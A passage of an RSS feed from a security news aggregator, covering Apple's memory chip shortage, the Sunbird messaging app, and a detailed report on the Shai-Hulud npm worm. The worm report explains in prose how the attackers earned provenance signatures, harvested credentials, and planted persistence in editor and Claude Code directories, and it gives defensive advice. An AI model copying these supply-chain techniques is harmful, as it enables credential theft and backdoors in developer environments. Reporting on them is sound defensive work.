<p class="wp-block-paragraph">Once again, what’s sustainable but difficult for larger brands such as Apple is existential disaster for smaller players — and it’s only now a matter of time before we see some <a href="https://www.wheresyoured.at/premium-the-haters-guide-to-the-memory-crisis/" target="_blank" rel="noreferrer noopener">real blood</a>. That’s particularly true in smart home and device markets, where manufacturers lack the margins to sustain higher memory prices while delivering products customers can afford. A recent <a href="https://www.electronics.org/news-release/industry-wide-memory-constraints-grow-ai-driven-supply-shift-reshapes-market" target="_blank" rel="noreferrer noopener">Global Electronics Association report</a> tells us 62% of electronics manufacturers are already experiencing constrained availability or extended lead times. It also tells us 82% expect rising prices, including 33% who cite a “significant increase.”</p>



<p class="wp-block-paragraph">This is already being felt by consumer and business users, as networking equipment is experiencing significant shipping delays. So, while we may find ourselves waiting a month or more for an iPhone, the wait for new routers, external storage devices, and home automation systems could be even longer once available inventories disappear. </p>



<p class="wp-block-paragraph">This doesn’t appear to be a short-term challenge; <a href="https://www.digitimes.com/news/a20260804PD217/2027-capacity-dram-nand-2026.html" target="_blank" rel="noreferrer noopener">a recent Digitimes report</a> warns that vendors have already sold their entire allocation of memory capacity for 2027.</p>



<p class="wp-block-paragraph">Don’t even get me started on the likely impact on the military and defense markets as high-performance memory, storage, and processor supplies become constrained. Just like <a href="https://news.sky.com/story/sunken-nazi-warships-emerge-from-the-danube-as-water-levels-drop-to-record-lows-13569774" target="_blank" rel="noreferrer noopener">declining river levels in Europe</a>, lack of memory threatens severe disruption. With so much turbulence impacting the tech economy, all we need now is for one or more of the<a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">investor-supported AI companies</a> that have helped create the memory shortages to default on loan payments.</p>



<h2 class="wp-block-heading"><strong>Got to keep the customer satisfied</strong></h2>



<p class="wp-block-paragraph">Eager to protect sales, Apple recently introduced the <a href="https://www.computerworld.com/article/4200023/own-nothing-upgrade-everything-apples-new-klarna-deal.html">Apple Upgrade leasing service in the US</a>. This should enable consumers to purchase new devices at prices <a href="https://www.applemust.com/apple-klarna-mean-we-can-now-get-apple-as-a-service/" target="_blank" rel="noreferrer noopener">more sustainable to them</a> over time. Apple isn’t alone in taking such action, which will inevitably extend beyond America.</p>



<p class="wp-block-paragraph">“OEMs are expanding financing, trade-in and buyback programs to improve affordability,” said Counterpoint’s Harshit Rastogi. “Samsung has also expanded its Galaxy Forever program to several markets to make flagship devices more accessible.” </p>



<p class="wp-block-paragraph">Such schemes are all well and good, of course. Consumers will embrace them in hopes of a better tomorrow. But the tech industry is not immune to the wider constellation of existential challenges impacting economic environments.</p>



<p class="wp-block-paragraph">In the end, if Apple, the industry’s biggest buyer of advanced components, is struggling to secure memory, the rest of the electronics sector is likely to face even greater challenges. For consumers, the initial impacts will be longer waits and higher prices. But the longer term consequences could be slower innovation and increased consolidation across the industry.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unsafe iMessage for Android app Sunbird just will not die]]></title>
<description><![CDATA[Even though Apple now supports RCS to let Android users join in iMessage conversations, the risky Sunbird app is back to persuade them to route everything through its servers anyway. Don't do it to yourself.That would be Android phones it's talking about. You're on an iPhone, you're fine. Image c...]]></description>
<link>https://tsecurity.de/de/3706503/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706503/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 19:43:35 +0200</pubDate>
<content:encoded><![CDATA[Even though Apple now supports RCS to let Android users join in <a href="https://appleinsider.com/inside/imessage" title="iMessage" data-kpt="1">iMessage</a> conversations, the risky Sunbird app is back to persuade them to route everything through its servers anyway. Don't do it to yourself.<br><br><div><img src="https://media.appleinsider.com/gallery/68474-144262-000-lead-Sunbird-xl.jpg" alt="Colorful ad with four diverse, happy people under bold text saying Love your phone but hate the green bubbles We made Sunbird for people like you on a purple background"><br><span>That would be Android phones it's talking about. You're on an iPhone, you're fine. Image credit: Sunbird</span></div><br>Previously on Sunbird... it was an <a href="https://appleinsider.com/articles/22/12/01/imessage-may-be-coming-to-android-with-sunbird">Android app</a> that let users partake in Apple iMessage conversations without a <a href="https://appleinsider.com/articles/23/12/21/if-you-want-blue-imessage-bubbles-that-much-buy-an-iphone">green bubble</a>, and with myriad security problems. It came and it went, and then Apple <a href="https://appleinsider.com/articles/26/05/13/rcs-encryption-havent-fixed-the-green-bubble-problem">added RCS support</a> so that Android users could do exactly this without the privacy issues.<br><br>Sunbird tried <a href="https://appleinsider.com/articles/24/04/08/astoundingly-unsafe-imessage-bridge-sunbird-is-back-and-you-still-shouldnt-use-it">coming back</a> in 2024 having promised to have fixed its security problems, but it really didn't because it really can't. Your data still went through its servers and the company can say all it likes that it doesn't peek, but this remains a firm you've never heard of and are expected to trust.<br><br><br> <a href="https://appleinsider.com/articles/26/08/05/unsafe-imessage-for-android-app-sunbird-just-will-not-die?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245174?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Uppsala Security Becomes First Blockchain Intelligence Company to Join Cyber Threat Alliance]]></title>
<description><![CDATA[SIngapore, Singapore, August 5th, 2026, CyberNewswire Uppsala Security, a Singapore-based blockchain intelligence and crypto forensics company, announced today that it has joined the Cyber Threat Alliance (CTA) as an Affiliate Member, becoming the first blockchain intelligence company to join the...]]></description>
<link>https://tsecurity.de/de/3706455/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706455/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 19:38:11 +0200</pubDate>
<content:encoded><![CDATA[<p>SIngapore, Singapore, August 5th, 2026, CyberNewswire Uppsala Security, a Singapore-based blockchain intelligence and crypto forensics company, announced today that it has joined the Cyber Threat Alliance (CTA) as an Affiliate Member, becoming the first blockchain intelligence company to join the alliance. CTA is a nonprofit organization that brings cybersecurity organizations together to share actionable threat […]</p>
<p>The post <a href="https://gbhackers.com/uppsala-security-joins-cyber-threat-alliance/">Uppsala Security Becomes First Blockchain Intelligence Company to Join Cyber Threat Alliance</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Poison Claude is Selling Cheap AI Tokens Built on Fake Accounts and Free Credits]]></title>
<description><![CDATA[A shadowy online service called Poison Claude is reselling access to Anthropic’s premium AI models at a significant discount. Researchers suggest that these savings are coming from an unexpected source: cloud accounts that have been fraudulently registered and filled with free bonus credits. As f...]]></description>
<link>https://tsecurity.de/de/3706449/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706449/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 19:36:49 +0200</pubDate>
<content:encoded><![CDATA[<p>A shadowy online service called Poison Claude is reselling access to Anthropic’s premium AI models at a significant discount. Researchers suggest that these savings are coming from an unexpected source: cloud accounts that have been fraudulently registered and filled with free bonus credits. As frontier AI tools like Claude have become essential for coding, research, […]</p>
<p>The post <a href="https://cybersecuritynews.com/poison-claude-selling-cheap-ai-tokens/">Poison Claude is Selling Cheap AI Tokens Built on Fake Accounts and Free Credits</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s memory crisis is a big red flag for tech]]></title>
<description><![CDATA[The memory crisis is getting worse for Apple, which is struggling to get enough memory chips together for its upcoming iPhone 18 Pro series smartphones. That’s according to tech journalist Tim Culpan.



As he details it, Apple and its assembly partners are still attempting to secure sufficient q...]]></description>
<link>https://tsecurity.de/de/3706418/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706418/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 19:31:18 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The memory crisis is getting worse for Apple, which is struggling to get enough memory chips together for its upcoming <a href="https://www.applemust.com/what-we-think-we-know-about-apples-next-new-iphones/" target="_blank" rel="noreferrer noopener">iPhone 18 Pro series smartphones</a>. That’s according to tech journalist <a href="https://open.substack.com/pub/timculpan/p/exclusive-apple-is-scrambling-for?r=5l3lg&amp;utm_campaign=post&amp;utm_medium=web" target="_blank" rel="noreferrer noopener">Tim Culpan</a>.</p>



<p class="wp-block-paragraph">As he details it, Apple and its assembly partners are still attempting to secure sufficient quantities of memory, and though they’re confident they can meet initial demand once the devices are introduced, they apparently remain concerned that wait times could rapidly extend as retail inventory evaporates.</p>



<p class="wp-block-paragraph">Apple’s manufacturing process compounds the problem. The A20 processor is packaged with memory using a new TSMC process, meaning processors are reportedly piling up while manufacturers wait for memory chips. You should <a href="https://open.substack.com/pub/timculpan/p/exclusive-apple-is-scrambling-for?r=5l3lg&amp;utm_campaign=post&amp;utm_medium=web" target="_blank" rel="noreferrer noopener">read Culpan’s report</a> to get the full picture.</p>



<h2 class="wp-block-heading"><strong>What’s the frequency?</strong></h2>



<p class="wp-block-paragraph">You don’t need to read between the lines to see the challenge. Despite demand for TSMC’s new processors, Apple seems to have been able to secure the supply it needs. But when it comes to churning out the final packaged chips memory, supply constraints have created significant obstacles to producing in quantity.</p>



<p class="wp-block-paragraph">This is bad for Apple, particularly as the challenge doesn’t appear to be confined to iPhones; customers are experiencing delays getting new Macs. “Many new orders are now not arriving until September,” Bloomberg’s <a href="https://x.com/markgurman/status/2083925868876017856?s=20" target="_blank" rel="noreferrer noopener">Mark Gurman wrote earlier this week</a>. </p>



<p class="wp-block-paragraph">It isn’t just Apple that will be impacted by the AI-driven memory drought. The scale of Apple’s orders is among the greatest in the industry, and if its product plans are feeling the pain, every other manufacturer will be feeling it as well.</p>



<h2 class="wp-block-heading"><strong>Conscious uncoupling</strong></h2>



<p class="wp-block-paragraph">This is certainly in tune with expectations voiced at the beginning of the year when Ranjit Atwal, senior director analyst at Gartner, <a href="https://www.gartner.com/en/newsroom/press-releases/2026-02-26-gartner-says-surging-memory-costs-will-reduce-global-pc-and-smartphone-shipments-in-2026" target="_blank" rel="noreferrer noopener">warned</a>: “This is the steepest contraction in device shipments witnessed in over a decade. Higher prices will narrow the range of devices available, prompting buyers to hold on to devices for longer, fundamentally altering upgrade cycles.”</p>



<p class="wp-block-paragraph">Gartner in February predicted a 10.4% decline in global PC shipments and an 8.4% drop in smartphone shipments as a result. The analyst also predicted a 130% surge in combined memory and SSD storage prices by the end of this year, with steep product price increases to follow. Recent data from IDC, Gartner, <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html">Counterpoint</a>, and <a href="https://omdia.tech.informa.com/pr/2026/july/worldwide-pc-market-declined-4percent-in-2q26-amid-mounting-supply-pressure" target="_blank" rel="noreferrer noopener">Omdia</a> confirm PC market declines, but only at around 4% (the estimates vary). </p>



<p class="wp-block-paragraph">Today’s report from Culpan suggests we’ve not yet experienced the full extent of this decline — hinting that while the initial fall reflected price, the next impact will be defined by lack of supply. While this hurts big brands like Apple, smaller entities could be left high and dry. </p>



<h2 class="wp-block-heading"><strong>When the chips are down</strong></h2>



<p class="wp-block-paragraph">It is interesting to reprise Atwal’s warning in February that, “the sub-$500 entry-level PC segment will disappear by 2028,” as this seems to be what’s happening. That’s something long-time Mac users like me find particularly ironic, given it was only this year Apple <a href="https://www.computerworld.com/article/4189546/apple-raises-hardware-prices-ai-is-to-blame.html">briefly offered up</a> its superbly priced $499 <a href="https://www.computerworld.com/article/4200605/macbook-neos-success-wasnt-luck-it-was-a-plan.html">MacBook Neo.</a> The industry direction we’re seeing now suggests we’ll never see that again, though the <a href="https://www.applemust.com/macbook-neo-continues-to-top-amazon-laptop-charts-in-us-uk/" target="_blank" rel="noreferrer noopener">success of that device</a> gave Apple a phenomenal <a href="https://www.computerworld.com/article/4203974/apples-tim-cook-era-ends-with-a-record-109b-quarter.html">28.7% increase in sales</a> in its <a href="https://www.computerworld.com/article/4203974/apples-tim-cook-era-ends-with-a-record-109b-quarter.html">just-revealed June quarter</a>.</p>



<p class="wp-block-paragraph">Despite memory supply challenges, Apple seems to be faring fairly well, with market share increasing across its business. Counterpoint data reveals that Apple has achieved an astonishing <a href="https://www.applemust.com/apple-grabs-65-premium-smartphone-market/#google_vignette" target="_blank" rel="noreferrer noopener">65% share of the premium smartphone market</a>. In part, that’s because as an existing premium brand, Apple was able to better absorb rising memory costs through higher margins and reduced promotions. Realistically, this means we can expect an <a href="https://www.computerworld.com/article/4189546/apple-raises-hardware-prices-ai-is-to-blame.html">overall increase in iPhone prices</a> when the new range is announced  up to $300 more, Jeff Pu, of GF Securities, <a href="https://x.com/sssjeffpu/status/2083138918766219327" target="_blank" rel="noreferrer noopener">recently claimed</a>. </p>



<h2 class="wp-block-heading"><strong>Building the moat</strong></h2>



<p class="wp-block-paragraph">Once again, what’s sustainable but difficult for larger brands such as Apple is existential disaster for smaller players — and it’s only now a matter of time before we see some <a href="https://www.wheresyoured.at/premium-the-haters-guide-to-the-memory-crisis/" target="_blank" rel="noreferrer noopener">real blood</a>. That’s particularly true in smart home and device markets, where manufacturers lack the margins to sustain higher memory prices while delivering products customers can afford. A recent <a href="https://www.electronics.org/news-release/industry-wide-memory-constraints-grow-ai-driven-supply-shift-reshapes-market" target="_blank" rel="noreferrer noopener">Global Electronics Association report</a> tells us 62% of electronics manufacturers are already experiencing constrained availability or extended lead times. It also tells us 82% expect rising prices, including 33% who cite a “significant increase.”</p>



<p class="wp-block-paragraph">This is already being felt by consumer and business users, as networking equipment is experiencing significant shipping delays. So, while we may find ourselves waiting a month or more for an iPhone, the wait for new routers, external storage devices, and home automation systems could be even longer once available inventories disappear. </p>



<p class="wp-block-paragraph">This doesn’t appear to be a short-term challenge; <a href="https://www.digitimes.com/news/a20260804PD217/2027-capacity-dram-nand-2026.html" target="_blank" rel="noreferrer noopener">a recent Digitimes report</a> warns that vendors have already sold their entire allocation of memory capacity for 2027.</p>



<p class="wp-block-paragraph">Don’t even get me started on the likely impact on the military and defense markets as high-performance memory, storage, and processor supplies become constrained. Just like <a href="https://news.sky.com/story/sunken-nazi-warships-emerge-from-the-danube-as-water-levels-drop-to-record-lows-13569774" target="_blank" rel="noreferrer noopener">declining river levels in Europe</a>, lack of memory threatens severe disruption. With so much turbulence impacting the tech economy, all we need now is for one or more of the<a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">investor-supported AI companies</a> that have helped create the memory shortages to default on loan payments.</p>



<h2 class="wp-block-heading"><strong>Got to keep the customer satisfied</strong></h2>



<p class="wp-block-paragraph">Eager to protect sales, Apple recently introduced the <a href="https://www.computerworld.com/article/4200023/own-nothing-upgrade-everything-apples-new-klarna-deal.html">Apple Upgrade leasing service in the US</a>. This should enable consumers to purchase new devices at prices <a href="https://www.applemust.com/apple-klarna-mean-we-can-now-get-apple-as-a-service/" target="_blank" rel="noreferrer noopener">more sustainable to them</a> over time. Apple isn’t alone in taking such action, which will inevitably extend beyond America.</p>



<p class="wp-block-paragraph">“OEMs are expanding financing, trade-in and buyback programs to improve affordability,” said Counterpoint’s Harshit Rastogi. “Samsung has also expanded its Galaxy Forever program to several markets to make flagship devices more accessible.” </p>



<p class="wp-block-paragraph">Such schemes are all well and good, of course. Consumers will embrace them in hopes of a better tomorrow. But the tech industry is not immune to the wider constellation of existential challenges impacting economic environments.</p>



<p class="wp-block-paragraph">In the end, if Apple, the industry’s biggest buyer of advanced components, is struggling to secure memory, the rest of the electronics sector is likely to face even greater challenges. For consumers, the initial impacts will be longer waits and higher prices. But the longer term consequences could be slower innovation and increased consolidation across the industry.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Shai-Hulud npm worm didn't fake its security check — it earned a legitimate one]]></title>
<description><![CDATA[An attacker on Tuesday took over the GitHub account of the developer who maintains keyv, a small key-value storage library that npm serves roughly 127 million times a week. Within hours, poisoned versions of keyv and its sibling caching packages were live on npm, carrying a credential-stealing wo...]]></description>
<link>https://tsecurity.de/de/3706411/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706411/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 19:31:14 +0200</pubDate>
<content:encoded><![CDATA[<p>An attacker on Tuesday took over the GitHub account of the developer who maintains <a href="https://keyv.org/">keyv</a>, a small key-value storage library that <a href="https://www.npmjs.com/">npm</a> serves roughly 127 million times a week. Within hours, poisoned versions of keyv and its sibling caching packages were live on npm, carrying a credential-stealing worm. By midday, <a href="https://www.aikido.dev/blog/keyv-and-friends-compromised-in-npm-supply-chain-attack">security firm Aikido</a> counted at least 868 compromised packages across 1,381 versions, together carrying over two billion monthly installs, a total still climbing. <a href="https://jfrog.com/">JFrog</a> independently traced the campaign across more than 400 packages and 1,700 poisoned versions. </p><p>The part that should worry every security team is not the download count. It is the paperwork. The initial poisoned releases shipped with valid provenance signatures, the cryptographic attestation the industry built to prove a package came from where it claims. The worm did not forge that signature. It earned it, the way a legitimate release would.</p><p>A day earlier, <a href="https://www.crowdstrike.com/en-us/">CrowdStrike</a> published its <a href="https://www.crowdstrike.com/en-us/blog/crowdstrike-2026-threat-hunting-report/">2026 Threat Hunting Report</a> and predicted this exact shape of attack. A section titled "Software Supply Chain Attacks Evolve" names the developer ecosystem itself, package registries, continuous integration pipelines, container registries, and the extensions developers load into their code editors, as the surface adversaries now go after directly. It puts npm packages at the center of that shift, tied to 87% of the malicious software registry threats CrowdStrike tracked in the first half of the year. The keyv worm turned that finding into a live incident inside 24 hours.</p><p>For CISOs and security architects, the two events read as one message. The trust signals built into the software supply chain can be satisfied by an attacker who owns the right account, and the window between disclosure and exploitation has collapsed past what monthly patching absorbs.</p><h2><b>How the worm earned its provenance</b></h2><p>Walk through the mechanism and it becomes clear why provenance did not help. According to Aikido's analysis, the attacker pushed malicious files straight to the main branch of each repository the maintainer controlled, then immediately cut a new release. Because the release ran through the maintainer's own GitHub Actions workflow, npm generated a legitimate provenance attestation for it. To anyone auditing supply chain integrity, the poisoned build looked authentic. <a href="https://www.wiz.io/blog/keyv-and-cacheable-npm-supply-chain-attack">Wiz confirmed the release path independently</a>, and in one targeted path documented by JFrog the worm went further. Inside a GitHub Actions run tied to opensearch-js, it requested an OIDC token, exchanged it for a publish token, and minted a Sigstore bundle through Fulcio and Rekor so the malicious tarball carried provenance generated from the trusted workflow context itself.</p><p>What turned a single account takeover into a registry-wide event was the spread. Once a poisoned package landed in a developer's environment or a build runner, its payload harvested every credential it could reach, then used any npm publishing tokens it found to backdoor other packages that the victim controlled. Each compromised maintainer became an unwitting distribution node, with Aikido watching dozens of newly infected packages appear every few minutes. The malware exfiltrated stolen secrets to public GitHub repositories tagged "Shai-Hulud: Here We Go Again," the signature that named the campaign.</p><p>This blast radius reached well beyond obscure utilities. Because keyv sits as a transitive dependency under many popular tools, the worm rode those chains into packages under corporate npm scopes, <a href="https://www.aikido.dev/blog/keyv-and-friends-compromised-in-npm-supply-chain-attack">with releases tied to Deliveroo, Qlik, and Picsart among the confirmed hits</a>. Developers at those companies never installed keyv on purpose. They only depended on something that depended on it, layers down a tree no one reviews by hand.</p><p>Credential extractors inside the payload reveal what the attackers were actually after, and it was never the caching libraries. <a href="https://research.jfrog.com/post/shai-hulud-is-back-august/">JFrog, which traced the compromise across keyv and cacheable</a>, and <a href="https://www.wiz.io/">Wiz</a> both found the malware harvesting cloud access keys, CI secrets, and the tokens that authenticate to production infrastructure. The package compromise was the vehicle, and the cloud behind it was always the destination. CrowdStrike found cloud-conscious criminal activity rose 171% in the first half of 2026, and supply chain compromise is one of the paths feeding it.</p><h2><b>The target was the developer's own tools</b></h2><p>Stealing was not the end of it, because the worm also planted itself where developers work. Wiz found that the malware drops persistence payloads into two directories on machines it reaches, one for Visual Studio Code and one named .claude, the working directory for Anthropic's Claude Code agent. The setup files placed there mean the payload can run when a developer opens the infected project in their editor or starts an AI coding session, not only at install time. This is the developer ecosystem CrowdStrike named, hit precisely, the editor and the AI assistant a developer trusts most and inspects least.</p><h2><b>The fix costs nothing</b></h2><p>One control would have blunted the worm, and it costs nothing. Adam Meyers, who leads Counter Adversary Operations at CrowdStrike, laid it out in a pre-release interview under embargo. "Secure the software supply chain," he said. "Simple things like not allowing any of your tooling to pull down the most recent dependencies, but maybe last week's dependencies." The delay is the whole point. "You're still going to have pretty up-to-date stuff, but you won't have that risk of pulling down something that was updated minutes ago, and now you've just onboarded some sort of malicious tooling." A release held back a week gives the security community time to catch a poisoning that would otherwise reach every downstream build within minutes.</p><p>That guidance is not hypothetical. npm shipped this capability in February 2026 with CLI version 11.10.0 as a <a href="https://docs.npmjs.com/cli/v11/using-npm/config#min-release-age">setting called min-release-age</a>. pnpm got there five months earlier with <a href="https://craigory.dev/blog/2026-05-29/package-manager-release-cooldown/">minimumReleaseAge</a>. Either one lets a team reject any package version published more recently than a threshold they set. The keyv worm is the argument for turning it on.</p><p>Meyers pairs the cooldown with a second discipline. Patch what attackers are exploiting before anything else. "You need to kind of focus your vulnerability mitigation and patching around the exploits that are known to the exploiter," he told VentureBeat. He pointed to a resource most teams underuse. "CISA here in the United States puts out something called the Known Exploited Vulnerability Catalog," updated weekly with flaws confirmed under active attack, government-maintained and free. "If you patch those vulnerabilities first, you're going to probably be safer."</p><p>Meyers put hard numbers to the speed problem, numbers that do not appear in the published report. All of 2025 saw roughly 48,200 vulnerabilities registered as CVEs. When he checked the week before the briefing, 2026 had already reached 43,000. </p><p>That volume breaks monthly patch cycles. "They cannot operate in 30-day patch windows," he told VentureBeat. "As soon as a vulnerability is disclosed, they need to be moving towards patching or mitigating that particular issue." CrowdStrike's report pairs that trajectory with a finding that 88% of the exploitation it observed against vulnerabilities with a public proof of concept happened inside 48 hours of the code going public.</p><h2><b>GitHub hardened half the problem</b></h2><p>GitHub, which owns npm, <a href="https://github.blog/changelog/2025-09-29-strengthening-npm-security-important-changes-to-authentication-and-token-management/">has spent the past year hardening the registry</a> against precisely this class of attack. The platform made two-factor authentication mandatory for publishing, revoked old never-expiring access tokens, and added trusted publishing so build systems push without stored credentials. Then in <a href="https://thehackernews.com/2026/07/npm-12-disables-install-scripts-by.html">npm version 12</a>, released in mid-2026, it flipped the most consequential default. The preinstall, install, and postinstall hooks that most registry malware relies on to execute the moment a package lands now require explicit approval.</p><p>That change matters directly here because the keyv worm executes through a preinstall script, and npm 12 cuts both ways. JFrog confirmed that on npm 12 or newer, where preinstall hooks are off by default, the malware does not run at install time. Every organization still on an older npm, and most enterprises upgrade slowly, remained exposed. </p><p>GitHub's defenses hardened the wrong half of the attack more than the right one, making it harder for a malicious package to execute once it lands while doing less to stop an attacker from earning the right to publish. Account takeover remains the root cause. Kiran Raj, a security engineer at <a href="https://www.endorlabs.com/">Endor Labs</a>, said he saw the same pattern, an npm publishing token stolen and reused, in most cases a CI or service-account token harvested from a build runner that had itself installed a poisoned dependency. The worm never had to defeat provenance. It needed one set of valid credentials, and npm's own publishing automation did the rest.</p><p>Provenance attestation answers whether a package came from the pipeline it claims. It does not answer whether the human or token that triggered that pipeline was supposed to. Identity governance, who can publish and what their credentials can reach, is the weaker control. CrowdStrike names abuse of legitimate developer identities as the primary entry point for supply chain compromise. Meyers put it plainly. "They log in, they don't hack in," he said. The keyv maintainer's account was that identity, and the trusted-publishing machinery did the rest on the attacker's behalf.</p><h2><b>Why the boardroom is next</b></h2><p>The pressure to fix this will not come only from threat reports. It is about to come through contracts. Kayne McGladrey, a senior member of the IEEE, told VentureBeat in an exclusive interview that enterprises are starting to push software security obligations onto the vendors and maintainers in their supply chains. "We're going to start seeing companies trying to contractually shift liability to other parties in their supply chain," he told VentureBeat. "We're using your technology, but we want you to do the security for it." </p><p>He compared it to how the Department of Defense forced its vendors to raise their game through the CMMC certification program. "Get better at cybersecurity if you want to sell us stuff." For any company shipping software on open-source dependencies, that turns provenance, identity, and patch discipline into contractual exposure.</p><h2><b>What to do Monday morning</b></h2><p>For a security team deciding what to do about this on Monday morning, the actions divide into five moves that map to the five ways this attack class operates. Each is a governance decision a board can fund and audit, not a tool a developer installs alone.</p><table><tbody><tr><td><p><b>How the attack operates</b></p></td><td><p><b>What the keyv worm showed</b></p></td><td><p><b>What the board funds and audits</b></p></td></tr><tr><td><p>The developer ecosystem is the target.</p></td><td><p>CrowdStrike names package registries, CI/CD pipelines, container registries, and IDE extensions as the surface adversaries hit directly. The keyv payload planted persistence hooks in developer editor and AI tooling directories, not just the package.</p></td><td><p>Require provenance attestation and trusted publishing before any dependency or editor extension enters a build. Give the board a standing inventory of registries, pipeline components, and extensions in scope. Treat developer tooling as an audited supplier category.</p></td></tr><tr><td><p>Automation makes the spread fast.</p></td><td><p>One stolen credential seeded a cascade that reached at least 868 packages and two billion monthly installs in hours, jumping between organizations every few minutes. The worm ran through a preinstall script, the install-time default npm v12 disables.</p></td><td><p>Turn on npm's min-release-age so tooling pulls last week's versions, not releases published minutes ago. Require npm v12 or install-script blocking across the build estate. Plan for simultaneous multi-package compromise in resilience testing.</p></td></tr><tr><td><p>Identity is the entry point.</p></td><td><p>The attack began with one hijacked GitHub maintainer account. Provenance signed the poisoned releases because they ran through the maintainer's own pipeline. Valid credentials, not a broken control, did the damage.</p></td><td><p>Mandate phishing-resistant multifactor authentication for every maintainer with publish rights. Prefer short-lived scoped tokens over long-lived ones. Report developer and machine identity coverage to the board as a countable liability.</p></td></tr><tr><td><p>The cloud is the real destination.</p></td><td><p>The payload carried targeted extractors for cloud access keys, CI secrets, and production infrastructure tokens. The package compromise was the vehicle. Cloud-conscious criminal activity rose 171% in the first half of 2026.</p></td><td><p>Classify developer workstations and CI runners as tier-zero assets with domain-controller rotation standards. Document cloud credential rotation in hours after any supply chain exposure. Report long-lived cloud keys with reduction targets.</p></td></tr><tr><td><p>The patch window has collapsed.</p></td><td><p>CrowdStrike observed 88% of exploitation with a public proof of concept inside 48 hours. Meyers put 2026 CVE registrations at 43,000 by late July against 48,200 for all of 2025. The keyv worm was live within hours, with no CVE to wait for.</p></td><td><p>Reset patch service levels for internet-facing systems from days to hours and fund continuous emergency patching as a budgeted operation. Give the audit committee time-from-disclosure-to-mitigation as a standing metric. Build defensibility on documented pre-patch compensating controls.</p></td></tr></tbody></table><p><i>Package counts reflect Aikido and JFrog tracking as of August 4 and were climbing at press time.</i></p><p>The keyv worm will be contained. Compromised versions pulled, stolen tokens rotated, affected packages republished clean. What will not change is the shape of the exposure it revealed. The developer ecosystem is now a primary target, the automation that makes it productive is the same automation that makes a worm fast, and the trust signals meant to secure it can be satisfied by anyone holding the right credentials. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Infinigate: Wachstum braucht Relevanz - it-business]]></title>
<description><![CDATA[Im Interview spricht der ehemalige Kyndryl-Deutschland-Chef über seine Wachstumsagenda, relevante Security-Trends und den Anspruch, Partner gezielter ...]]></description>
<link>https://tsecurity.de/de/3706322/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706322/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 18:00:53 +0200</pubDate>
<content:encoded><![CDATA[Im Interview spricht der ehemalige Kyndryl-Deutschland-Chef über seine Wachstumsagenda, relevante <b>Security</b>-Trends und den Anspruch, Partner gezielter ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft: Entwickler sollen bei KI sparen - 'Tokenmaxxing' unerwünscht]]></title>
<description><![CDATA[Weil die Kosten für den Ausbau der Infrastruktur hinter Diensten aus dem Bereich der sogenannten Künstlichen Intelligenz weiter steigen, ruft Microsofts Management die Entwickler des Konzerns auf, bei der KI-Nutzung sparsam vorzugehen.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3706155/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706155/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 16:38:52 +0200</pubDate>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160428.html"><img hspace="5" border="0" align="left" alt="Hacker, Security, Hack, Entwickler, Entwicklung, Cybersecurity, Exploit, Hacking, Code, Programmierung, Quellcode, Programmierer, Developer, Programmieren, Sdk, Sourcecode, Cyber, Dev, Coding, Coder, Development, Binärcode, Binär" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/38886.jpg"></a>
